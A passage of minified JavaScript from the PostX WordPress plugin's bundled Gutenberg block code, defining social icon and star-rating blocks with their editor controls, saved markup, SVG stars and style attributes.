{z-index:{{advanceZindex}};}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},80400:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(60553),n=l(56098),r=l(6864),s=l(29299);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/social-icon-block/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/social_icons.svg",alt:"Social Icons"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display customizable Social Icons that link to your social profiles","ultimate-post")),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/social_icon.svg"}},edit:i.Z,save:n.Z})},25616:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(31760),s=l(64766),p=l(78764);const{__}=wp.i18n,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor,{useState:m,useEffect:g,Fragment:y}=wp.element,{Dropdown:b}=wp.components,{createBlock:v}=wp.blocks,{select:h}=wp.data,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const[t,l]=m("Content"),{name:w,className:x,setAttributes:T,attributes:_,clientId:C,attributes:{blockId:E,advanceId:S,socialText:P,customImg:L,socialIconType:I,customIcon:B,btnLink:U,enableSubText:M,socialSubText:A}}=e;g((()=>{const e=C.substr(0,6),t=f(k(C));E?E&&E!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||T({blockId:e})):T({blockId:e})}),[C]);const H={setAttributes:T,name:w,attributes:_,setSection:l,section:t,clientId:C};let N;E&&(N=(0,i.Kh)(_,"ultimate-post/social",E,(0,a.k0)()));const j=h("core/block-editor").getBlockParents(C),Z=h("core/block-editor").getBlockAttributes(j[j.length-1]),{enableText:O,enableIcon:R}=Z;function D(e){return I==e}g((()=>{T({enableText:O,enableIcon:R})}),[O,R]);const z=D("image"),F=D("icon"),W=d({...S&&{id:S},className:`ultp-block-${E} ${x}`});return(0,o.createElement)(y,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:H})),(0,o.createElement)(r.Z,{include:[{type:"linkbutton",key:"btnLink",onlyLink:!0,value:U,placeholder:"Enter Social URL",label:__("Social Url","ultimate-post")}],store:H}),(0,o.createElement)("li",W,N&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),(0,o.createElement)("a",{href:"#",className:"ultp-social-content"},(0,o.createElement)(y,null,z&&R&&(0,o.createElement)("div",{className:"ultp-social-bg"},(0,o.createElement)("img",{src:L.url||"#",alt:"Social Image"})),F&&R&&(0,o.createElement)(b,{popoverProps:{placement:"bottom-start"},className:"ultp-social-dropdown",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{onClick:()=>e(),className:"ultp-social-bg"},s.dX[B]),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:B,isSocial:!0,label:"Update Single Icon",dynamicClass:" ",onChange:e=>H.setAttributes({customIcon:e,socialIconType:"icon"})})}),(0,o.createElement)("div",{className:"ultp-social-title-container"},O&&(0,o.createElement)("div",{className:"ultp-social-title"},(0,o.createElement)(u,{key:"editable",tagName:"div",placeholder:__("Label…","ultimate-post"),onChange:e=>T({socialText:e}),onReplace:(e,t,l)=>wp.data.dispatch("core/block-editor").replaceBlocks(C,e,t,l),onSplit:e=>v("ultimate-post/social",{..._,socialText:e}),value:P})),O&&M&&(0,o.createElement)("div",{className:"ultp-social-sub-title"},(0,o.createElement)(u,{key:"editable",tagName:"div",placeholder:__("Sub Text…","ultimate-post"),onChange:e=>T({socialSubText:e}),value:A})))))))}},91030:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{Fragment:i}=wp.element,{useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,socialText:r,customImg:s,socialIconType:p,enableText:c,customIcon:u,enableIcon:d,btnLink:m,btnLinkTarget:g,btnLinkDownload:y,btnLinkNoFollow:b,btnLinkSponsored:v,enableSubText:h,socialSubText:f}=e.attributes;function k(e){return p==e}const w=k("image"),x=k("icon");let T="noopener";T+=b?" nofollow":"",T+=v?" sponsored":"";const _=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,a.createElement)("li",_,(0,a.createElement)("a",(0,o.Z)({href:"",className:"ultp-social-content"},m.url&&{href:m.url,target:g},{rel:T,download:y&&"download"}),(0,a.createElement)(i,null,w&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},(0,a.createElement)("img",{src:s.url,alt:"Social Image"})),x&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},"_ultp_sc_ic_"+u+"_ultp_sc_ic_end_"),(0,a.createElement)("div",{className:"ultp-social-title-container"},c&&(0,a.createElement)("div",{className:"ultp-social-title",dangerouslySetInnerHTML:{__html:r}}),c&&h&&(0,a.createElement)("div",{className:"ultp-social-sub-title",dangerouslySetInnerHTML:{__html:f}})))))}},78764:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"button",title:__("Icon","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"linkbutton",key:"btnLink",onlyLink:!0,placeholder:"Enter Social URL",label:__("Social Url","ultimate-post")}},{position:2,data:{type:"tag",key:"socialIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"image",label:__("Image","ultimate-post")},{value:"none",label:__("None","ultimate-post")}]}},{position:5,data:{type:"icon",key:"customIcon",isSocial:!0,label:__("Icon Store","ultimate-post")}},{position:10,data:{type:"media",key:"customImg",label:__("Upload Custom Image","ultimate-post")}},{position:11,data:{type:"color2",key:"contentBg",label:__("Content Background","ultimate-post")}},{position:15,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:20,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"iconBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"iconHvrColor",label:__("Icon Hover Color","ultimate-post")},{type:"color",key:"iconHvrBg",label:__("Icon Hover Background","ultimate-post")},{type:"border",key:"iconHvrBorder",label:__("Hover Border","ultimate-post")}]}]}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),include:[{position:1,data:{type:"color",key:"socialTextColor",label:__("Text Color","ultimate-post")}},{position:2,data:{type:"color",key:"socialTextHoverColor",label:__("Text Hover Color","ultimate-post")}},{position:3,data:{type:"toggle",key:"enableSubText",label:__("Enable Sub Text","ultimate-post")}},{position:4,data:{type:"color",key:"socialSubTextColor",label:__("SubText Color","ultimate-post")}},{position:5,data:{type:"typography",key:"subTextTypo",label:__("SubText Typography","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))},84751:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},enableText:{type:"boolean",default:!0},enableIcon:{type:"boolean",default:!0},btnLink:{type:"object",default:{url:"#"}},btnLinkTarget:{type:"string",default:"_blank"},btnLinkNoFollow:{type:"boolean",default:!1},btnLinkSponsored:{type:"boolean",default:!1},btnLinkDownload:{type:"boolean",default:!1},socialText:{type:"string",default:"WordPress"},socialIconType:{type:"string",default:"icon",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}]}]},customIcon:{type:"string",default:"wordpress_solid",style:[{depends:[{key:"socialIconType",condition:"==",value:"icon"}]}]},customImg:{type:"object",default:"",style:[{depends:[{key:"socialIconType",condition:"==",value:"image"}]}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}}.wp-block-ultimate-post-social .ultp-social-content"}]},iconColor:{type:"string",default:"",style:[{depends:[{key:"socialIconType",condition:"==",value:"icon"}],selector:"{{ULTP}} .ultp-social-content .ultp-social-bg svg { color:{{iconColor}}; }"}]},iconBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg { background-color:{{iconBg}}; }"}]},iconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg"}]},iconHvrColor:{type:"string",default:"",style:[{depends:[{key:"socialIconType",condition:"==",value:"icon"}],selector:"{{ULTP}} .ultp-social-content:hover .ultp-social-bg svg { color:{{iconHvrColor}}; }"}]},iconHvrBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg:hover { background: {{iconHvrBg}};}"}]},iconHvrBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg:hover"}]},socialTextColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-title, {{ULTP}} .ultp-social-title a { color:{{socialTextColor}}; } "}]},socialTextHoverColor:{type:"string",default:"",style:[{selector:".ultp-social-icons-wrapper > {{ULTP}}.wp-block-ultimate-post-social:hover .ultp-social-title, \n            .ultp-social-icons-wrapper > {{ULTP}}.wp-block-ultimate-post-social:hover .ultp-social-title a, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-social .ultp-social-title, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-social .ultp-social-title a { color:{{socialTextHoverColor}}; } "}]},enableSubText:{type:"boolean",default:!1},subTextTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableSubText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-sub-title"}]},socialSubText:{type:"string",default:"Sub Text"},socialSubTextColor:{type:"string",default:"",style:[{depends:[{key:"enableSubText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-sub-title { color:{{socialSubTextColor}}; } "}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has(> {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has(> {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has(> {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},73342:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(87462),a=l(67294),i=l(83245),n=l(84751);const{Fragment:r}=wp.element,s={v1:{attributes:{...n.Z},save(e){const{btnLink:t,blockId:l,advanceId:n,socialText:s,customImg:p,enableText:c,customIcon:u,enableIcon:d,enableSubText:m,socialSubText:g,btnLinkTarget:y,socialIconType:b,btnLinkDownload:v,btnLinkNoFollow:h,btnLinkSponsored:f}=e?.attributes;function k(e){return b==e}const w=k("image"),x=k("icon");let T="noopener";return T+=h?" nofollow":"",T+=f?" sponsored":"",(0,a.createElement)("li",(0,o.Z)({},n&&{id:n},{className:`ultp-block-${l}`}),(0,a.createElement)("a",(0,o.Z)({href:"",className:"ultp-social-content"},t?.url&&{href:t?.url,target:y},{rel:T,download:v&&"download"}),(0,a.createElement)(r,null,w&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},(0,a.createElement)("img",{src:p.url,alt:"Social Image"})),x&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},i.T0[u]),(0,a.createElement)("div",{className:"ultp-social-title-container"},c&&(0,a.createElement)("div",{className:"ultp-social-title",dangerouslySetInnerHTML:{__html:s}}),c&&m&&(0,a.createElement)("div",{className:"ultp-social-sub-title",dangerouslySetInnerHTML:{__html:g}})))))}}},p=[...Object.values(s)]},71807:(e,t,l)=>{"use strict";var o=l(67294),a=l(25616),i=l(91030),n=l(84751),r=l(60134),s=l(73342);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;p(r,{parent:["ultimate-post/social-icons"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/social.svg",alt:"Social item"}),attributes:n.Z,edit:a.Z,save:i.Z,deprecated:s.Z})},11645:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(23372);const{__}=wp.i18n,{useEffect:s,useState:p,Fragment:c}=wp.element,{getBlockAttributes:u,getBlockRootClientId:d}=wp.data.select("core/block-editor"),{RichText:m,useBlockProps:g}=wp.blockEditor;function y(e){const[t,l]=p("Content"),{setAttributes:y,name:v,className:h,attributes:f,clientId:k,attributes:{blockId:w,previewImg:x,advanceId:T,currentPostId:_,starType:C,enableTitle:E,titleText:S,startRange:P,smallRange:L,largeRange:I}}=e;s((()=>{const e=k.substr(0,6),t=u(d(k));(0,a.qi)(y,t,_,k),w?w&&w!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||y({blockId:e})):y({blockId:e}),y({className:h})}),[k]);const B={setAttributes:y,name:v,attributes:f,setSection:l,section:t,clientId:k};let U;if(w&&(U=(0,i.Kh)(f,"ultimate-post/star-rating",w,(0,a.k0)())),x)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x});const M="small"==P?L:I,[A,H]=p(M);s((()=>{H(M)}),[P,L,I]);const[N,j]=p(null),Z=null!=N?N:A,O=null!=N?N:M,R=g({className:`ultp-block-${w} ${h}`,...T&&{id:T}});return(0,o.createElement)(c,null,(0,o.createElement)(r.Z,{store:B}),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:B}),(0,o.createElement)("div",R,U&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:U}}),(0,o.createElement)("div",{className:"ultp-block-wrapper ultp-rating-block"},(0,o.createElement)("div",{className:"ultp-rating-icon"},Array("small"==P?5:10).fill().map(((e,t)=>{const l=Z>=t+1?O>t?100*(O-t):0:Z>t?100*(Z-t):0;return(0,o.createElement)(c,{key:t},(0,o.createElement)(b,{index:t,id:`${t}${k}`,range:l,type:C,onHover:j,onClick:H,setAttributes:y}))}))),E&&(0,o.createElement)(m,{key:"editable",tagName:"div",className:"ultp-rating-title",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Write Message","ultimate-post"),onChange:e=>y({titleText:e}),value:S}))))}const b=({index:e,range:t,onHover:l,onClick:a,setAttributes:i,type:n,id:r})=>{const s=`clip-${r}`,p=t=>{const{left:o,width:a}=t.currentTarget.getBoundingClientRect(),i=(t.clientX-o)/a;l(i<=.5?e+.5:e+1)},u=t=>{const{left:l,width:o}=t.currentTarget.getBoundingClientRect(),n=(t.clientX-l)/o<=.5?e+.5:e+1;a(n),i({smallRange:`${n}`,largeRange:`${n}`})};return(0,o.createElement)(c,null,"outline"==n?(0,o.createElement)(v,{handleMouseMove:p,handleClick:u,clipId:s,onHover:l,range:t}):(0,o.createElement)(h,{handleMouseMove:p,handleClick:u,onHover:l,clipId:s,range:t}))},v=({range:e,onHover:t,clipId:l,handleMouseMove:a,handleClick:i})=>(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",style:{pointerEvents:"auto"},xmlns:"http://www.w3.org/2000/svg",onClick:i,onMouseLeave:()=>t(null),onMouseMove:a},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",width:e/100*20,height:"20"}))),(0,o.createElement)("path",{fill:"none",stroke:"#ddd",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fill:"none",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"})),h=({range:e,onHover:t,clipId:l,handleMouseMove:a,handleClick:i})=>(0,o.createElement)(c,null,(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",fill:"none",onMouseMove:a,onMouseLeave:()=>t(null),onClick:i,style:{pointerEvents:"auto"},xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",width:e/100*20,height:"20"}))),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",fill:"#E0E0E0",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fillRule:"evenodd",clipRule:"evenodd",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"})))},63939:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294);const{useBlockProps:a}=wp.blockEditor;function i(e){const{blockId:t,advanceId:l,enableTitle:i,titleText:s,startRange:p,largeRange:c,smallRange:u,className:d,starType:m}=e.attributes,g="small"===p?5:10,y="small"===p?20*u:10*c,b=a.save({className:`ultp-block-${t} ${d}`,...l&&{id:l}});return(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",b,(0,o.createElement)("div",{className:"ultp-block-wrapper ultp-rating-block"},(0,o.createElement)("div",{className:"ultp-rating-icon"},Array("small"==p?5:10).fill().map(((e,l)=>{const a=100/g,i=Math.min(Math.max(y-l*a,0),a)/a*100;return(0,o.createElement)(o.Fragment,{key:l},"outline"==m?(0,o.createElement)(n,{id:`${l}${t}`,range:i}):(0,o.createElement)(r,{id:`${l}${t}`,range:i}))}))),i&&s?.length?(0,o.createElement)("div",{className:"ultp-rating-title",dangerouslySetInnerHTML:{__html:s}}):"")))}const n=({range:e=100,id:t})=>{const l=`clip-${t}`,a=e/100*20;return(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",width:`${a}`,height:"20"}))),(0,o.createElement)("path",{fill:"none",stroke:"#ddd",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fill:"none",stroke:"#F17B2C",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"}))},r=({range:e=100,id:t})=>{const l=`clip-${t}`,a=e/100*20;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",height:"20",width:`${a}`}))),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",fill:"#E0E0E0",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fillRule:"evenodd",clipRule:"evenodd",fill:"#F17B2C",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"})))}},23372:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,{InspectorControls:r}=wp.blockEditor,s=({store:e})=>(0,o.createElement)(r,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8858",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"general",title:__("General","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:e,title:"inline",include:[{position:1,data:{type:"tag",key:"starType",inline:!0,label:__("Rating Style","ultimate-post"),options:[{value:"fill",label:__("Fill","ultimate-post")},{value:"outline",label:__("Outline","ultimate-post")}]}},{position:2,data:{type:"group",key:"startRange",justify:!0,label:__("Range","ultimate-post"),options:[{value:"small",label:__("1–5","ultimate-post")},{value:"large",label:__("1–10","ultimate-post")}]}},{position:3,data:{type:"range",key:"smallRange",min:0,max:5,step:.1,responsive:!1,label:__("Rating Range","ultimate-post")}},{position:4,data:{type:"range",key:"largeRange",min:0,max:10,step:.1,responsive:!1,label:__("Rating Range","ultimate-post")}},{position:5,data:{type:"alignment",key:"contentAlignment",disableJustify:!0,responsive:!0,icons:["juststart","justcenter","justend"],options:["flex-start","center","flex-end"],label:__("Alignment","ultimate-post")}},{position:6,data:{type:"toggle",key:"enableTitle",label:__("Enable Title","ultimate-post")}},{position:7,data:{type:"tag",key:"starPosition",label:__("Star Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]})),(0,o.createElement)(i.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:e,title:__("Star Style","ultimate-post"),include:[{position:1,data:{type:"color",key:"starColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"color",key:"unmarkedColor",label:__("Unmarked Color","ultimate-post")}},{position:3,data:{type:"range",key:"starSize",min:0,max:300,step:1,responsive:!0,label:__("Star Size","ultimate-post")}},{position:4,data:{type:"range",key:"starGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Stars","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:e,title:__("Title Style","ultimate-post"),include:[{position:1,data:{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")}},{position:2,data:{type:"color",key:"titleColor",label:__("color","ultimate-post")}},{position:3,data:{type:"range",key:"titleGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Title and star","ultimate-post")}}]})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e}))))},87509:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},accordionList:{type:"string",default:""},starType:{type:"string",default:"outline"},enableTitle:{type:"boolean",default:!0},titleText:{type:"string",default:""},startRange:{type:"string",default:"small"},smallRange:{type:"string",default:"2.5",style:[{depends:[{key:"startRange",condition:"==",value:"small"}]}]},largeRange:{type:"string",default:"2.5",style:[{depends:[{key:"startRange",condition:"==",value:"large"}]}]},starPosition:{type:"string",default:"left",style:[{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-rating-block { flex-direction: row-reverse }"},{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"right"}]},{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-rating-block { flex-direction: column-reverse; }"},{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-rating-block { flex-direction: column; }"}]},contentAlignment:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} { 